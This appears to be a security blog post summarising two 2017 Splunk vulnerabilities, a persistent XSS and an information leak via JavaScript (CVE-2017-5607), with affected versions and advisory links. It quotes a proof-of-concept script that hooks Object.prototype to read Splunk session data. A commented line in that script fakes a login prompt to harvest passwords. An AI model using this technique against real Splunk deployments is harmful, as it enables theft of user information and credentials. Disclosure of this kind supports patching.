Splunk Address Multiple Vulnerabilities Last Week

Splunk is a big data platform and also used in various SOC as SIEM tool for log analysis. Splunk is the leader in Operational Intelligence platform. Splunk customers use the splunk to do monitoring, searching, analyzing and visualize machine data. Volume of data collected in the splunk is very high. 

Splunk Enterprise 6.5.3, 6.2.13.1 and Splunk Light 6.5.2 address multiple vulnerabilities:

• Persistent Cross Site Scripting in Splunk Web (SPL-134841)
• Information Leakage via JavaScript (CVE-2017-5607)

 

Refer this link for the details and mitigation for both the vulnerabilities : https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607

 

Affected Products and Components

 

Persistent Cross Site Scripting in Splunk Web (SPL-134841)

Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and Splunk Light before 6.5.2

Affected Components: All Splunk Enterprise components running Splunk Web.

 

Information Leakage via JavaScript (CVE-2017-5607)

Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2

Affected Components: All Splunk Enterprise components.

 

 

Below the proof-of-concept JavaScript code published in the advisory:

<script>
Object.defineProperty( Object.prototype, “$C”, { set:function(val){
//prompt(“Splunk Timed out:\nPlease Login to Splunk\nUsername:
“+val.USERNAME, “Password”)
for(var i in val){
alert(“”+i+” “+val[i]);
}
}
});
</script>

 

For more details regarding information leakage via Javascript: http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt

It contains exploit/POC and how to produce the exploit : http://seclists.org/fulldisclosure/2017/Mar/89

Video POC: https://vimeo.com/210634562

Post created by

newWorld